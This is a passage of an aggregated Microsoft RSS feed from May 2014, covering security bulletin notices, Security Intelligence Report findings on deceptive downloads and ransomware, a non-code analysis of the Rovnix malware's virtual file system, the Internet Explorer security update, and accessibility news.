(ANS) for the release of eight bulletins, two rated Critical and six rated Important in severity. These updates will address vulnerabilities for .NET Framework, Office, Internet Explorer, and Windows.</p> <p>As we do every month, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, May 13, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for deployment guidance and further analysis together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-may"><span style="color:#0000ff;">ANS summary page</span></a> for more information to help you prepare for deployment priorities and security bulletin testing.</p> <p>You can follow us on Twitter. The MSRC handle is <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0000ff;">@MSFTSecResponse</span></a>.&nbsp;</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0000ff;">Dustin Childs</span></a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629217&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsANS.NET FrameworkInternet Explorer (IE)Microsoft Office Get advance notice about May 2014 security updateshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/05/08/get-advance-notice-about-may-2014-security-updates.aspxThu, 08 May 2014 18:50:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522823Eve Blakemore6http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10522823http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/08/get-advance-notice-about-may-2014-security-updates.aspx#comments<p>Today, the Microsoft Security Response Center (MSRC) posted&nbsp;details&nbsp;about the&nbsp;<a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-may">May security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar&mdash;be sure to click it.</p> <p>In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the<span class="apple-converted-space">&nbsp;</span><a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter<span class="apple-converted-space">&nbsp;</span><strong>Turn automatic updating on or off</strong>, and tap or click<span class="apple-converted-space">&nbsp;</span><strong>Settings</strong><span class="apple-converted-space">&nbsp;</span>to find it.&nbsp;</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The&nbsp;<a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a>&nbsp;offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522823" width="1" height="1">automatic updatingAdvance Notification ServiceANS May 15th Is Global Accessibility Awareness Day: Ways to Celebrate Digital Inclusionhttp://blogs.msdn.com/b/accessibility/archive/2014/05/08/may-15th-is-global-accessibility-awareness-day-ways-to-celebrate-digital-inclusion.aspxThu, 08 May 2014 14:08:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10523534Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10523534http://blogs.msdn.com/b/accessibility/archive/2014/05/08/may-15th-is-global-accessibility-awareness-day-ways-to-celebrate-digital-inclusion.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- On May 15th we will celebrate Global Accessibility...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/08/may-15th-is-global-accessibility-awareness-day-ways-to-celebrate-digital-inclusion.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10523534" width="1" height="1"> New research shows rise in “deceptive downloads”http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/07/new-research-shows-rise-in-deceptive-downloads.aspxWed, 07 May 2014 17:31:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10523377Eve Blakemore39http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10523377http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/07/new-research-shows-rise-in-deceptive-downloads.aspx#comments<p>According to the latest <a href="http://www.microsoft.com/security/sir/default.aspx">cybersecurity report</a> from Microsoft, &ldquo;deceptive downloads&rdquo; were the top threat for 95 percent of the 110 countries surveyed.</p> <h1>What are deceptive downloads?</h1> <p>Deceptive downloads are legitimate downloadable programs (usually free) such as software, games, or music that cybercriminals bundle with malicious items.</p> <p>For example, you might receive a file in email or through social networking, but when you try to open it you see a message that says you don&rsquo;t have the right software to open it. You do a search online and come across a free software download that claims it can help you open the file. You download that software, but you unknowingly might also be downloading malicious software (also known as &ldquo;malware&rdquo;) with it. This malware might have the ability to access personal information on your computer or <a href="http://www.microsoft.com/security/resources/botnet-whatis.aspx">use your computer for cybercrime</a>.</p> <p>It could be months or even years before you notice your system has malware.</p> <h1>How can I avoid deceptive downloads?</h1> <ul> <li>Think before you click.</li> <li>Only download software from websites you trust. For more information, see <a href="http://www.microsoft.com/security/online-privacy/trusted-sites.aspx">How do I know if I can trust a website?</a></li> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Turn on automatic updating</a> so that you&rsquo;re always using the latest, most secure versions of the software installed on your computer.</li> <li>Make sure you&rsquo;re using <a href="http://www.microsoft.com/security/resources/antivirus-whatis.aspx">antivirus software</a> and keeping it up to date.</li> <li>Use newer software whenever possible.</li> </ul> <h1>What should I do if I think I&rsquo;ve been a victim of a deceptive download?</h1> <p>Do a scan with your antivirus software. If your computer is running Windows 8 or Windows 8.1, you can use the built-in&nbsp;<a href="http://www.microsoft.com/security/pc-security/windows8.aspx#antivirus">Windows Defender</a>&nbsp;to check for and to help you get rid of a virus or other malware.</p> <p>If your computer is running Windows 7 or Windows Vista, do the following:</p> <ul> <li><a href="http://www.microsoft.com/security/scanner/en-us/default.aspx">Run the Microsoft Safety Scanner</a>. The scanner works with the antivirus software that you already have on your computer, regardless of whether the software is from Microsoft.</li> <li>Download&nbsp;<a href="http://www.microsoft.com/security/resources/mse-whatis.aspx">Microsoft Security Essentials</a>&nbsp;for free, and then use the software to run a scan of your computer. For more information, see&nbsp;<a href="http://www.microsoft.com/security/pc-security/microsoft-security-essentials.aspx">Get free virus protection with Microsoft Security Essentials</a>. (<strong>Note:</strong> Some malware will prevent you from downloading Microsoft Security Essentials. If you can&rsquo;t access the Internet to download the software, try <a href="http://windows.microsoft.com/en-us/windows/windows-defender-offline-faq">Windows Defender Offline</a>.)</li> <li>Some malicious software can be difficult to remove. If your antivirus software detects malware but can&rsquo;t remove it,&nbsp;<a href="http://www.microsoft.com/security/portal/mmpc/help/remediation.aspx">follow these steps</a>.</li> </ul> <h1>What is the Security Intelligence Report?</h1> <p>The <a href="http://www.microsoft.com/security/sir/default.aspx">Microsoft Security Intelligence Report (SIR)</a> covers research on computer security, including software vulnerabilities, exploits, and&nbsp;<a href="http://www.microsoft.com/security/resources/malware-whatis.aspx">malicious and potentially unwanted software</a>. Volume 16 of the report was released today. If you want to learn more about deceptive downloads and other key findings, please visit <a href="http://www.microsoft.com/sir">Microsoft.com/SIR</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10523377" width="1" height="1">security intelligence reportSIRMicrosoft Security EssentialsWindows 7malicious softwareMicrosoft Safety ScannerWindows 8deceptive downloadsWindows 8.1 SIRv16: Cybercriminal tactics trend toward deceptive measureshttp://blogs.technet.com/b/mmpc/archive/2014/05/07/sirv16-cybercriminal-tactics-trend-toward-deceptive-measures.aspxWed, 07 May 2014 13:01:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4423c745-6c4f-4a77-a1b1-984ac92dddafmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/05/07/sirv16-cybercriminal-tactics-trend-toward-deceptive-measures.aspx#comments<div class="ExternalClassEB60DAC428954EBFBA2F90AC6968EC2F"> <p>Microsoft&rsquo;s <a href="http://www.microsoft.com/security/sir/default.aspx">Security Intelligence Report volume 16</a>&nbsp;(SIRv16) was released today, providing threat trends on malware encounter rates, infection rates, vulnerabilities, exploits, and more for 110 countries/regions worldwide. The report is designed to help IT and security professionals better protect themselves and their organizations from cyberattacks.</p> <p>Malware data is gathered from the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool</a>&nbsp;(MSRT), which is used to calculate the infection rate (<a href="http://www.microsoft.com/security/sir/glossary.aspx#C">Computers Cleaned per Mille</a> (CCM), and our real-time protection products are used to derive the <a href="http://www.microsoft.com/security/sir/glossary.aspx#E">encounter rate</a>. One of the more notable findings included in the report was an increase in worldwide infection rates and encounter rates. About 21.2 percent of reporting computers encountered malware each quarter in 2013. We also saw an infection rate of 11.7 CCM.</p> <p>More specifically, the infection rate increased from a CCM rate of 5.6 in the third quarter of 2013 to 17.8 in the fourth&mdash;a threefold increase, and the largest infection rate increase ever measured by the MSRT between two consecutive quarters. This rise was predominantly affected by malware <a href="http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">using deceptive tactics</a>, influenced by three families not unfamiliar to readers of this blog: <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Sefnit">Sefnit</a>, and its related families <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Rotbrow">Rotbrow</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Brantall">Brantall</a>.</p> <p>Sefnit, a bot which gives a remote attacker a multitude of options, is often used in connection with activities that help attackers make money&mdash;things like click fraud and Bitcoin mining. In fact, Sefnit was first detected because it was leveraging click hijacking, and users reported seeing their searches redirected. Researchers widely believed the Sefnit threat was diminished and it didn&rsquo;t re-emerge until it started to behave differently, acting like a proxy service and giving attackers the ability to leverage a botnet of Sefnit-hosted proxies to relay web traffic issuing illegitimate &ldquo;clicks&rdquo; for online ads.</p> <p>These new Sefnit variants operated in the background, evading detection by researchers for a short while. Rotbrow, software that poses as protection from browser plug-ins (&ldquo;Browser Protector&rdquo;), and Brantall, which fronts as an installer for some legitimate software programs, were both caught directly installing Sefnit in the second half of the year. Once detection was added, Sefnit became the third most commonly encountered malware family in the third quarter of 2013, dropping down as detections for Rotbrow and Brantall were added to Microsoft security products.</p> <p>Once Rotbrow was added to MSRT it went to the top of the charts as the number one threat encountered and cleaned globally in the second half of 2013. In the fourth quarter, Rotbrow was the most commonly encountered malware family with an encounter rate of 5.90 percent.</p> <p>Brantall followed as the next most commonly encountered threat, with an encounter rate of 3.55 percent in that same quarter.&nbsp; &nbsp;</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/sir16b.png"> <img width="500" alt="2013 encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/sir16b.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: 2013 encounter rates for major threat families in the second half of 2013 </em></p> <p>However, deceptive techniques are not limited to these three families.</p> <p>Ransomware is another type of deceptive tactic that is less prevalent but can be devastating to owners of infected systems.</p> <p>In threat families such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Reveton">Reveton</a>, <a href="http://www.microsoft.com/en-us/search/results.aspx?q=Urausy+site:http://www.microsoft.com/security/portal">Urausy</a>, or the highly publicized <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=Crilock">Crilock</a> (also known as Cryptolocker), cybercriminals gain control of a user&rsquo;s computer and lock them out of access to their own files, holding files for ransom and refusing to return control of it or their files until the victim pays a fee. In many instances, control of the computer or files is never returned to the victim, causing them to lose valuable data, pictures, movies, music, etc. Certain cases of ransomware, where local or national &quot;authorities&quot; appeared to warn of an alleged crime committed by the computer user and demand a &quot;fine&quot;, were extremely threatening. Many users were so threatened by the fake warnings that they felt they had no choice but to pay the fee. Between the first and second halves of 2013, the top ransomware threat encountered globally, Reveton, increased by 45 percent.</p> <p>While there was an increase in deceptive tactics, interestingly, there was a decrease in exploits.</p> <p>In the second half of 2013, exploits&mdash;particularly Java exploits and web-based threats&mdash;declined between the first and second halves of the year. As always, malicious hackers work to vary what they focus on exploiting, ultimately engaging us in a game of whack-a-mole. First, a decline in web-based threats was seen, followed by a drop in Java exploits.&nbsp; Some of this decline correlated with the discovery and subsequent <a href="http://www.bbc.com/news/technology-24456988">arrest of alleged exploit kit author Paunch</a>, and some of it might have been associated with exploit kit writers varying the exploits they use in their popular kits. You can find more data on exploits and how they trended in SIRv16.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/sir16a.png"> <img style="width:500px;height:281px;" alt="2013 exploit encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/sir16a.png" border="0" /></a> &nbsp;&nbsp; <br /><em>Figure 2: 2013 exploit encounter rates &nbsp;&nbsp; </em></p> <p>In SIRv16, the Trustworthy Computing security science team has elaborated on exploit trends in its in-depth study of exploits of vulnerabilities in Microsoft products. Markedly, they have identified&nbsp;a 70 percent decline in the number of severe vulnerabilities (those that can enable remote code execution) exploited in Microsoft products between 2010 and 2013.</p> <p>As always, the best protection from malware and potentially unwanted software is to <a href="http://www.microsoft.com/security/portal/mmpc/help/updateFAQs.aspx">keep all your software up-to-date</a> and run a real-time security product such as <a href="http://windows.microsoft.com/en-au/windows/security-essentials-download">Microsoft Security Essentials</a>.&nbsp;</p> <p>Additional data on deceptive threats as well as much more regional-, platform- and category-specific analysis is available now in Volume 16, which you can download at <a href="http://www.microsoft.com/sir">www.microsoft.com/sir</a>.</p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629072&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> New Data Sheds Light on Shifting Cybercriminal Tacticshttp://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspxWed, 07 May 2014 13:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:125dc645-79c9-4aa0-acc0-876d597ea538Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3628764http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3628764http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx#comments<p>New data released today suggests that the security mitigations that Microsoft has included in newer software has helped make&nbsp;malicious cyber acts&nbsp;more difficult for would-be attackers. Effective security mitigations raise the cost of doing business for cybercriminals. The data also indicates that cybercriminals are increasingly utilizing deceptive tactics in their attempts to compromise systems.</p> <p>This is a key finding of our latest <a href="http://www.microsoft.com/sir">cybersecurity report</a>, that we publish twice a year to help our customers, partners, and the broader cybersecurity community understand the tools, tactics and threats posed by cybercriminals. This knowledge is essential for IT and security professionals trying to better protect themselves and their organizations from cyber-attacks.</p> <p>New research conducted by Trustworthy Computing&rsquo;s Security Science team shows a <strong>70 percent decline</strong> in the number of severe vulnerabilities (those that can enable remote code execution) that were exploited in Microsoft products between 2010 and 2013. This is a clear indication that newer products are providing better protection, even in cases where vulnerabilities exist. While this trend is promising, cybercriminals aren&rsquo;t giving up. Our data shows that in the second half of 2013 there was a noticeable increase in cybercriminal activity where attackers used deceptive practices. The continued increase in deceptive tactics is striking; in the last quarter of 2013, the number of computers impacted as a result of deceptive tactics <strong>more than tripled</strong>. The security mitigations included in newer Microsoft products have raised the technical bar for would-be attackers, which may be one of the factors driving an increase in the use of deceptive tactics.&nbsp;<a href="/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/07/new-data-sheds-light-on-shift-in-cybercriminal-tactics.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628764&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Cybersecurity ReportMicrosoft Security Intelligence Report Volume 16Deceptive DownloadsSIRv16ransomware Updated Cybersecurity Papers on Supply Chain Security and Critical Infrastructure Protectionhttp://blogs.technet.com/b/security/archive/2014/05/06/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspxTue, 06 May 2014 17:55:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:383c8100-780a-420b-9d37-09893786350eMicrosoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3628417http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3628417http://blogs.technet.com/b/security/archive/2014/05/06/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspx#comments<p>Posted by:<strong> Kevin Sullivan</strong>, Principal Security Strategist, Trustworthy Computing</p> <p>Today we&rsquo;re releasing updated versions of two popular white papers on software supply chain security and critical infrastructure protection.&nbsp; These papers draw on our policies and practices that involve regular assessments of the security challenges facing our customers and our operations, as well as ongoing learnings gained through our experiences defending more than one billion users from cyber-threats.&nbsp; We are pleased to share our learnings on these two critical security topics.&nbsp;&nbsp;&nbsp;<a href="/b/security/archive/2014/04/30/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/06/revised-cybersecurity-papers-on-supply-chain-security-and-critical-infrastructure-protection.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628417&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">risk managementCritical Infrastructure ProtectionTrusted Supply ChainCybersecurityGlobal Security Strategy and DiplomacyGSSD United Nations Convention Opens a New Era of Disability Policies around the Worldhttp://blogs.msdn.com/b/accessibility/archive/2014/05/06/united-nations-convention-opens-a-new-era-of-disability-policies-around-the-world.aspxTue, 06 May 2014 16:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10523453Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10523453http://blogs.msdn.com/b/accessibility/archive/2014/05/06/united-nations-convention-opens-a-new-era-of-disability-policies-around-the-world.aspx#commentsMicrosoft Plays a Key Role Helping Countries Apply Convention in IT Arena Ecuador&rsquo;s Ambassador to the United Nations, Luis Gallegos, was an architect of the landmark Convention on Rights for Persons with Disabilities (CRPD), and remains a tireless...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/06/united-nations-convention-opens-a-new-era-of-disability-policies-around-the-world.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10523453" width="1" height="1"> The evolution of Rovnix: new Virtual File System (VFS)http://blogs.technet.com/b/mmpc/archive/2014/05/05/the-evolution-of-rovnix-new-virtual-file-system-vfs.aspxTue, 06 May 2014 01:54:52 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e204d824-cd35-4afc-bba0-ac9a8f8458fbmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/05/05/the-evolution-of-rovnix-new-virtual-file-system-vfs.aspx#comments<div class="ExternalClassD4B7402F1AD04EC3942124868AA5FA3D"> <p>Last July, we published a blog about <a href="http://blogs.technet.com/b/mmpc/archive/2013/07/25/the-evolution-of-ronvix-private-tcp-ip-stacks.aspx">Rovnix&rsquo;s private TCP/IP stack</a>.</p> <p>We recently discovered another evolution in Rovnix &ndash; a variant that introduces a new Virtual File System (VFS).&nbsp;</p> <p>With our latest signature update we detect this Rovnix dropper as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper%3aWin32%2fRovnix.L">TrojanDropper:Win32/Rovnix.L</a> and the infected VBR (Volume Boot Record) as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Virus%3aDOS%2fRovnix.gen!A">Virus:DOS/Rovnix.gen!A</a>.</p> <p>Unlike older Rovnix variants that store their components as raw disk sectors at the end of the disk, TrojanDropper:Win32/Rovnix.L stores its components in a binary file:<em> %system32%\&lt;hex&gt;.bin</em>. Note that this file won&rsquo;t be accessed normally (see figure 1). This VFS uses RC4 to encrypt the stored data at the disk sector level (see figures 2a and 2b).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov1b.png"> <img alt="VFS binary" src="http://www.microsoft.com/security/portal/blog-images/a/Rov1b.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: TrojanDropper:Win32/Rovnix.L VFS binary file</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov2a.png"> <img width="500" alt="RC4 encryption" src="http://www.microsoft.com/security/portal/blog-images/a/Rov2a.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2a. RC4 encrypted disk sector data stored in VFS</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov2b.png"> <img width="500" alt="Plain text data" src="http://www.microsoft.com/security/portal/blog-images/a/Rov2b.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2b. Plain text disk sector data </em></p> <p>To prevent this file from being accessed, TrojanDropper:Win32/Rovnix.L installs a mini-filter and also hooks kernel APIs (e..g NtCreateFile( ) and NtDeleteFile( )) to protect this file.</p> <p>This new variant also contains a user-mode bot code, which uses the VFS to store the data such as keylog and stolen passwords (see figure 3).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Rov3.png"> <img width="500" alt="VFS data storage" src="http://www.microsoft.com/security/portal/blog-images/a/Rov3.png" border="0" /></a>&nbsp;</p> <p><em>Figure 3: (Rovnix variant) uses VFS to store stolen data </em></p> <p>Clearly, this is another step in Rovnix evolution for stealth and reliability purposes. This VFS can be used not only for storing Rovnix&rsquo;s components, it can also be accessed from user-mode component (the bot) for data storage.</p> <p>Fortunately, this new variant doesn&rsquo;t pose any more of a challenge for detection and remediation. As always, the best way to stay protected is with an up-to-date real-time security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a> or <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a>.&nbsp;</p> <p><em>Chun Feng</em><br /><em>MMPC</em></p> <p>Sha1: bac0cceeacfe2b91b05a961621f5cdd9323f0163</p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628823&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Ai Squared and GW Micro Merge. New Company will continue to develop and support the Window-Eyes for Office Offer http://blogs.msdn.com/b/accessibility/archive/2014/05/01/ai-squared-and-gw-micro-merge-new-company-will-continue-to-develop-and-support-the-window-eyes-for-office-offer.aspxThu, 01 May 2014 23:28:59 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522060Daniel Hubbell - MSFT1http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10522060http://blogs.msdn.com/b/accessibility/archive/2014/05/01/ai-squared-and-gw-micro-merge-new-company-will-continue-to-develop-and-support-the-window-eyes-for-office-offer.aspx#commentsTwo leaders in assistive technology for vision-impaired users, Ai Squared and GW Micro , are merging, and the new company will continue providing the Window-Eyes screen reader. The merger combines the maker of the screen magnifier Zoom Text, Ai Squared...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/01/ai-squared-and-gw-micro-merge-new-company-will-continue-to-develop-and-support-the-window-eyes-for-office-offer.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522060" width="1" height="1"> Available now: Security update for Internet Explorerhttp://blogs.msdn.com/b/securitytipstalk/archive/2014/05/01/available-now-security-update-for-internet-explorer.aspxThu, 01 May 2014 17:10:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10521955Eve Blakemore80http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10521955http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/01/available-now-security-update-for-internet-explorer.aspx#comments<p>Today, Microsoft released a security update for Internet Explorer, that we <a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/04/28/guidance-for-internet-explorer-vulnerability.aspx">blogged about earlier this week</a>.</p> <p>You probably already have automatic updates enabled and will not need to take any action. The update will be downloaded and installed automatically. If you&rsquo;re unsure if you have automatic updates, or if you haven't already enabled <a href="http://windows.microsoft.com/en-US/windows/help/windows-update">automatic updating</a>, now is the time.</p> <p>Windows XP is no longer supported by Microsoft, however, we decided to issue a security update for our Windows XP customers. We continue to encourage our customers to upgrade to a modern operating system, such as Windows 7 or 8.1 and use Internet Explorer 11, the latest version of our web browser.</p> <p>We&nbsp;encourage you&nbsp;to take steps that protect your computer such as enabling a <a href="http://www.microsoft.com/security/pc-security/firewalls-whatis.aspx">firewall</a>, applying all <a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">software updates</a>, and installing <a href="http://www.microsoft.com/security/resources/antivirus-whatis.aspx">antivirus</a> and <a href="http://www.microsoft.com/security/resources/antispyware-whatis.aspx">antispyware software</a>.</p> <p><a href="http://www.microsoft.com/security/pc-security/ie.aspx">Stay up-to-date with the latest version of Internet Explorer</a>.</p> <p>For more information, please see the <a href="http://blogs.technet.com/b/microsoft_blog/archive/2014/05/01/updating-internet-explorer-and-driving-security.aspx">Official Microsoft blog</a>.&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10521955" width="1" height="1">updatesInternet Explorersecurity updatesautomatic updatingAutomatic UpdatessecurityMicrosoft Security Trends in Cloud Computing Part 2: Addressing data challenges in healthcarehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspxThu, 01 May 2014 16:16:55 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8e41e187-1e67-4c01-8571-f1b5f2a6556eTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>In <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">Part 1 of this series</a>, we looked at survey data from financial services organizations and discussed some potential benefits for those that adopt cloud computing. The data are derived from the <a target="_blank" href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525">Cloud Security Readiness Tool</a> (CSRT), which helps organizations evaluate whether cloud adoption will meet their business needs. In today&rsquo;s post, I want to focus on cloud security trends in the healthcare industry.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/30/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628577&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersrisk managementRecoveryAdrienne HallReliableCloudReliabilityTrustcustomer perspectiveITTechnologyStandardscloud trust studyCloud Computingcloud servicesTrustworthy Computingpersonal dataDataPrivacyMicrosoft Cloud SolutionsIT Pros Security Update Released to Address Recent Internet Explorer Vulnerability http://blogs.technet.com/b/msrc/archive/2014/05/01/security-update-released-to-address-recent-internet-explorer-vulnerability.aspxThu, 01 May 2014 16:05:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:91b2a534-edc9-4ddb-acc9-23985296c349Dustin C. Childs0<p><span style="font-family:Calibri;font-size:small;">Today, we released a </span><a href="https://technet.microsoft.com/library/security/ms14-021"><span style="color:#0563c1;font-family:Calibri;font-size:small;">security update</span></a><span style="font-family:Calibri;font-size:small;"> to address the Internet Explorer (IE) vulnerability first described in </span><a href="https://technet.microsoft.com/library/security/2963983"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Security Advisory 2963983</span></a><span style="font-family:Calibri;font-size:small;">. This security update addresses every version of Internet Explorer. </span></p> <p><span style="font-family:Calibri;font-size:small;">While we&rsquo;ve seen only a limited number of targeted attacks, customers are advised to install this update promptly. The majority of our customers have automatic updates enabled and so will not need to take any action as protections will be downloaded and installed automatically. If you&rsquo;re unsure if you have automatic updates, or you haven&rsquo;t enabled </span><a href="http://windows.microsoft.com/en-US/windows/help/windows-update"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Automatic Update</span></a><span style="font-family:Calibri;font-size:small;">, now is the time.&nbsp; </span></p> <p><span style="font-family:Calibri;font-size:small;">For those manually updating, we strongly encourage you to apply this update as quickly as possible, following the directions in the released security bulletin.</span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">We have made the decision to issue a security update for Windows XP users. Windows XP is no longer supported by Microsoft, and we continue to encourage customers to migrate to a modern operating system, such as Windows 7 or 8.1. Additionally, customers are encouraged to upgrade to the latest version of Internet Explorer, IE 11. You can find more information on the Microsoft Security Bulletin </span></span><a href="https://technet.microsoft.com/library/security/ms14-may"><span style="font-family:Calibri;font-size:small;">summary webpage</span></a><span style="font-family:Calibri;font-size:small;">.</span></p> <p><span style="font-family:Calibri;font-size:small;">We invite you to join Jonathan Ness and myself for a live webcast at 11 a.m. PDT tomorrow, where we&rsquo;ll provide a detailed review of the bulletin. You can register </span><a href="https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93"><span style="color:#0563c1;font-family:Calibri;font-size:small;">here</span></a><span style="font-family:Calibri;font-size:small;">. </span></p> <p><span style="font-family:Calibri;font-size:small;">*<em>Updated 5/2/2014 - The 11 